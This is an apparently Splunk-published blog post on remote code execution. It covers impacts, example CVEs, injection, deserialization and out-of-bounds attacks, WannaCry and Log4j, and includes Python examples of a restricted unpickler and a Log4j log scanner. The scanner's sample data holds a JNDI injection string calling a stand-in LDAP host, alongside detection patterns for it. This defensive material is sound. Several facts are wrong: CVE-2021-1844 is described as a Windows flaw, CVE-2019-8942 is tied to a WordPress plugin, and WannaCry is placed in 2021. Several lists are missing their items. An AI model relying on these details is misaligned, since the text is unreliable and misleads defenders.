Attackers use remote code execution as a way to gain unauthorized access, perform data breaches, disrupt services and deploy malware. Here’s how you can protect your organization from RCE attacks:
Let’s dive deep into remote code execution and, importantly, its prevention techniques.
Remote Code Execution (RCE) is a method that allows attackers to gain unauthorized access to devices and launch attacks from a remote location. With RCE, hackers can infiltrate their target's systems without needing physical access to the networks or devices.
RCE vulnerabilities fall under the category of arbitrary code execution (ACE), which encompasses a range of vulnerabilities that enable attackers to execute unauthorized code and take control of targeted systems.
Here’s how RCE attacks work:
RCE vulnerabilities can have significant impacts on organizations, ranging from financial losses to reputational damage and compromised data security. Here are some of the key impacts that organizations may experience due to RCE:
Attackers execute arbitrary code on a remote system and gain unauthorized access to the target organization's network, servers or applications. Once they get access, they can:
RCE vulnerabilities result in data breaches where sensitive information is accessed, stolen or tampered with. Depending on the compromised data, organizations can face legal repercussions, financial penalties and loss of customer and industry trust.
Attackers also disrupt critical services or applications by executing malicious code to crash systems and cause downtime and interruptions in business operations. This impacts the organization negatively and causes severe financial losses, productivity issues and customer dissatisfaction.
When attackers gain remote code execution capabilities, they can misuse it to launch a denial-of-service attack. In this scenario, the attacker executes code that renders the system unresponsive, which results in a denial of service for legitimate users.
RCE-powered DoS attacks can disrupt online services, websites, even entire networks, causing inconvenience, financial losses or reputational damage to the affected entities.
Attackers can deploy malicious code on the compromised system to run cryptomining software without the owner's consent. They harness the system's processing power, electricity, and other resources to mine cryptocurrencies for their own benefit.
Unauthorized cryptomining consumes more power, slows down the system, and causes higher operational costs for the victim and potential damage to hardware due to excessive usage.
(Read our full cryptomining prevention guide.)
Ransomware is malware that encrypts files on a targeted system and demands a ransom for their decryption. (Ransomware families are making ransomware even more ubiquitous.)
Once attackers gain control through RCE, they initiate the ransomware attack by encrypting critical files and making them inaccessible to the victim. They then ask for a ransom payment, usually in cryptocurrencies, in exchange for providing the decryption key.
Recently, our security research team SURGe wanted to know the answer to: “How long do you have before ransomware encrypts your systems?” The answer: faster than you think. Read the blog or the full research.
Now let’s look at some CVEs that relied on remote code execution. The Common Vulnerabilities and Exposures (CVE) is a publicly available listing of frequently occurring vulnerabilities and exposures.
Also known as Log4Shell or the Log4j vulnerability, CVE-2021-44228 allows RCE attacks when the library is used with a certain configuration. An attacker can exploit this vulnerability by sending a crafted log message to a vulnerable server.
Organizations using Apache Log4j were advised to update to the latest patched version (2.15.0 or later) to mitigate this vulnerability.
(See Splunk’s response to Log4j.)
CVE-2021-1844 was discovered in the Windows Win32k component. It is an elevation of privilege vulnerability that could be exploited to execute arbitrary code in kernel mode.
Microsoft released security updates to address this vulnerability. Users should ensure their Windows systems are updated with the latest patches.
CVE-2020-17051 affects Windows Hyper-V, a virtualization feature in Microsoft Windows. It allows an authenticated attacker to execute arbitrary code on the host operating system.
Microsoft released security updates to address this vulnerability. Users should ensure their Windows systems are updated with the latest patches.
These vulnerabilities aren’t limited to operating systems. CVE-2019-8942 was found in WordPress, a popular content management system. It is an RCE vulnerability that affects the Easy WP SMTP plugin, allowing unauthenticated attackers to execute arbitrary code by injecting malicious PHP code.
(Learn more about these vulnerabilities.)
Let’s now look at the 3 types of remote code execution attacks.
Injection-based RCE attacks are attacks in which attackers inject malicious code or commands into a target system. They do this through:
By injecting malicious code, the attacker executes arbitrary commands on the target system, which helps them gain unauthorized access and control.
Deserialization is the process of converting serialized data into objects. Deserialization-based RCE attacks exploit vulnerabilities in the deserialization process of an application.
Attackers manipulate serialized data so that when it is deserialized, it executes malicious code. This type of attack can occur in applications that deserialize data from untrusted sources, allowing the attacker to execute arbitrary code on the target system.
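As an added example (not code from the original article), here is the defensive side of the deserialization problem in Python: a loader that refuses to resolve any class outside an allow-list, so serialized data from an untrusted source cannot direct the deserializer to a type the application never meant to instantiate. The two sample blobs are constructed in the block itself.

```python
import collections
import io
import pickle

# Globals the hardened loader will resolve. Anything a serialized blob
# asks for outside this list is refused before the object is constructed,
# which is the point at which an unrestricted deserializer would run code.
ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "str"),
    ("builtins", "int"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """pickle.Unpickler that resolves only allow-listed global names."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"refusing to load global {module}.{name}")


def load_or_reject(blob: bytes):
    """Deserialize untrusted bytes: ("ok", obj) or ("rejected", reason)."""
    try:
        return "ok", RestrictedUnpickler(io.BytesIO(blob)).load()
    except pickle.UnpicklingError as exc:
        return "rejected", str(exc)


# Constructed sample inputs (hypothetical session records, not real data).
# BENIGN_BLOB uses only primitive containers; DISALLOWED_BLOB references a
# class outside the allow-list and stands in for any blob that names a type
# the application does not expect to reconstruct.
BENIGN_BLOB = pickle.dumps({"user": "alice", "roles": ["viewer"]})
DISALLOWED_BLOB = pickle.dumps(collections.OrderedDict(user="bob"))

if __name__ == "__main__":
    print(load_or_reject(BENIGN_BLOB))
    print(load_or_reject(DISALLOWED_BLOB))
```

Where the data only needs to carry primitives, a format such as JSON that cannot name classes at all removes the problem entirely; the allow-list is for code that must keep a native serializer.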
Out-of-bounds write vulnerabilities occur when an attacker writes data beyond the boundaries of a specific memory buffer or data structure. By exploiting this vulnerability, an attacker can modify critical data, control program flow, and execute arbitrary code.
Out-of-bounds write vulnerabilities can be found in software components like network protocols, file formats or image parsers.
Here are a few techniques that you can use to mitigate RCE attacks in your organization:
In 2017, a dangerous computer attack called WannaCry spread on its own — without needing people to click on anything. It would encrypt important files on someone's computer and then ask for money to unlock them.
Many computers that WannaCry targeted hadn't been updated properly to fix security issues. In early 2021, many companies were affected by WannaCry because the attack quickly spread to other computers on a network.
Log4J is used to keep a record of things that happen on a computer system, like errors or routine operations, which helps system administrators know what's going on. But in December 2021, a flaw in Log4J affected popular software used by many applications written in the Java programming language.
The problem with Log4J was that it had a feature that allowed people to put their own code into the log messages. This feature was misused by hackers who remotely controlled computers by sending special messages to the log.
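As an added example that is not part of the original post, a small Python detector that scans access-log lines for Log4j lookup syntax arriving in a user-controlled field. The log format, the `ua="..."` field and the hostnames are made up for this illustration.

```python
import re

# Log4j resolves "${name:arg}" lookups inside strings it formats, so lookup
# syntax arriving in an attacker-controlled field (User-Agent, headers, form
# values) is itself a reason to alert. The "jndi" lookup is the one abused
# in CVE-2021-44228 and is rated more severe than any other lookup.
LOOKUP_RE = re.compile(r"\$\{")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Hypothetical access-log format: the User-Agent sits in a ua="..." field.
UA_RE = re.compile(r'ua="([^"]*)"')

# Constructed sample lines, not taken from any real incident.
SAMPLE_LOGS = [
    'host=web01 GET /index.html 200 ua="${jndi:ldap://lookup-host.example/a}"',
    'host=web01 GET /api 200 ua="${date:yyyy}"',
    'host=web02 GET /status 200 ua="Mozilla/5.0 (X11; Linux x86_64)"',
]


def classify(line: str) -> str:
    """Return "jndi", "lookup" or "clean" for one access-log line."""
    match = UA_RE.search(line)
    if not match:
        return "clean"  # no untrusted field present in this line
    field = match.group(1)
    if JNDI_RE.search(field):
        return "jndi"
    if LOOKUP_RE.search(field):
        return "lookup"
    return "clean"


def scan(lines):
    """Group suspicious lines by severity; clean lines are dropped."""
    hits = {"jndi": [], "lookup": []}
    for line in lines:
        label = classify(line)
        if label != "clean":
            hits[label].append(line)
    return hits


if __name__ == "__main__":
    for severity, lines in scan(SAMPLE_LOGS).items():
        for line in lines:
            print(f"[{severity}] {line}")
```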
Remote code execution (RCE) attacks are a significant threat to organizations. They involve identifying vulnerabilities in the target system, exploiting those vulnerabilities with crafted payloads, and executing the attacker's code on the target system.
To protect against RCE attacks, organizations should prioritize the prevention techniques discussed in this article.
This posting does not necessarily represent Splunk's position, strategies or opinion.